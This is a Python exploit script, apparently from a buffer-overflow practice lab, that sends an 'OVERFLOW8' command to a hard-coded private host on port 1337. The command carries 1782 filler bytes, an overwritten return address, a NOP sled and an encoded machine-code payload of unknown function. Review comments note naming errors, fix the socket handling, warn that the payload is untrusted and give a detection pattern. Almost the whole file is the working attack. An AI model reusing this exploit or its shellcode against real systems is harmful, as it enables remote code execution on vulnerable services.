#!/usr/bin/python
import sys, socket
# Opaque payload bytes that the script places at the very end of the buffer it
# sends (see the concatenation that follows this literal).
# NOTE(review): the name "overflow" is misleading -- this is the trailing
# payload, not the filler that overruns the target buffer.
# NOTE(review): nothing in this file records how these bytes were produced or
# what they do when executed. Treat them as untrusted machine code: keep the
# script inside an isolated lab and do not assume the blob is benign.
overflow = (
"\xdb\xd9\xbd\xa5\x84\xf5\xd2\xd9\x74\x24\xf4\x5f\x29\xc9\xb1"
"\x52\x31\x6f\x17\x83\xef\xfc\x03\xca\x97\x17\x27\xe8\x70\x55"
"\xc8\x10\x81\x3a\x40\xf5\xb0\x7a\x36\x7e\xe2\x4a\x3c\xd2\x0f"
"\x20\x10\xc6\x84\x44\xbd\xe9\x2d\xe2\x9b\xc4\xae\x5f\xdf\x47"
"\x2d\xa2\x0c\xa7\x0c\x6d\x41\xa6\x49\x90\xa8\xfa\x02\xde\x1f"
"\xea\x27\xaa\xa3\x81\x74\x3a\xa4\x76\xcc\x3d\x85\x29\x46\x64"
"\x05\xc8\x8b\x1c\x0c\xd2\xc8\x19\xc6\x69\x3a\xd5\xd9\xbb\x72"
"\x16\x75\x82\xba\xe5\x87\xc3\x7d\x16\xf2\x3d\x7e\xab\x05\xfa"
"\xfc\x77\x83\x18\xa6\xfc\x33\xc4\x56\xd0\xa2\x8f\x55\x9d\xa1"
"\xd7\x79\x20\x65\x6c\x85\xa9\x88\xa2\x0f\xe9\xae\x66\x4b\xa9"
"\xcf\x3f\x31\x1c\xef\x5f\x9a\xc1\x55\x14\x37\x15\xe4\x77\x50"
"\xda\xc5\x87\xa0\x74\x5d\xf4\x92\xdb\xf5\x92\x9e\x94\xd3\x65"
"\xe0\x8e\xa4\xf9\x1f\x31\xd5\xd0\xdb\x65\x85\x4a\xcd\x05\x4e"
"\x8a\xf2\xd3\xc1\xda\x5c\x8c\xa1\x8a\x1c\x7c\x4a\xc0\x92\xa3"
"\x6a\xeb\x78\xcc\x01\x16\xeb\xf9\xc4\x1c\x7f\x95\xe4\x1c\x6e"
"\x3a\x60\xfa\xfa\xd2\x24\x55\x93\x4b\x6d\x2d\x02\x93\xbb\x48"
"\x04\x1f\x48\xad\xcb\xe8\x25\xbd\xbc\x18\x70\x9f\x6b\x26\xae"
"\xb7\xf0\xb5\x35\x47\x7e\xa6\xe1\x10\xd7\x18\xf8\xf4\xc5\x03"
"\x52\xea\x17\xd5\x9d\xae\xc3\x26\x23\x2f\x81\x13\x07\x3f\x5f"
"\x9b\x03\x6b\x0f\xca\xdd\xc5\xe9\xa4\xaf\xbf\xa3\x1b\x66\x57"
"\x35\x50\xb9\x21\x3a\xbd\x4f\xcd\x8b\x68\x16\xf2\x24\xfd\x9e"
"\x8b\x58\x9d\x61\x46\xd9\xbd\x83\x42\x14\x56\x1a\x07\x95\x3b"
"\x9d\xf2\xda\x45\x1e\xf6\xa2\xb1\x3e\x73\xa6\xfe\xf8\x68\xda"
"\x6f\x6d\x8e\x49\x8f\xa4")
# Buffer layout, in send order:
#   1. 1782 filler bytes ("A") -- the "exact match" offset the author measured.
#   2. 4 bytes: the address 0x625011af written least-significant byte first,
#      as x86 stores it (presumably the value that replaces the saved return
#      pointer -- confirm against the target binary).
#   3. 32 bytes of 0x90 as padding in front of the payload.
#   4. The payload bytes held in `overflow`.
# NOTE(review): despite its name, `shellcode` holds the whole buffer, not
# just the payload.
# Detection note: one client message carrying a long run of 0x41 followed by
# a run of 0x90 is a recognisable pattern for network or host monitoring.
shellcode = "".join((
    "A" * 1782,
    "\xaf\x11\x50\x62",
    "\x90" * 32,
    overflow,
))
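# Open one TCP connection to the lab host, send the command prefix followed by
# the buffer, and close the socket.
# The address is hard-coded and sits in the private 10.0.0.0/8 range; keep it
# pointed at an isolated practice target you are authorised to test.
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        s.connect(('10.10.224.209', 1337))  # change ip and port here
        s.send(('OVERFLOW8 /.:/') + shellcode)
    finally:
        # The original wrote `s.close` without parentheses, which only
        # references the method and never closes the socket.
        s.close()
except socket.error as exc:
    # Catch socket failures only: a bare `except:` also hid programming errors
    # (and KeyboardInterrupt) behind a generic connection message.
    print("Error connecting to server: %s" % exc)
    sys.exit()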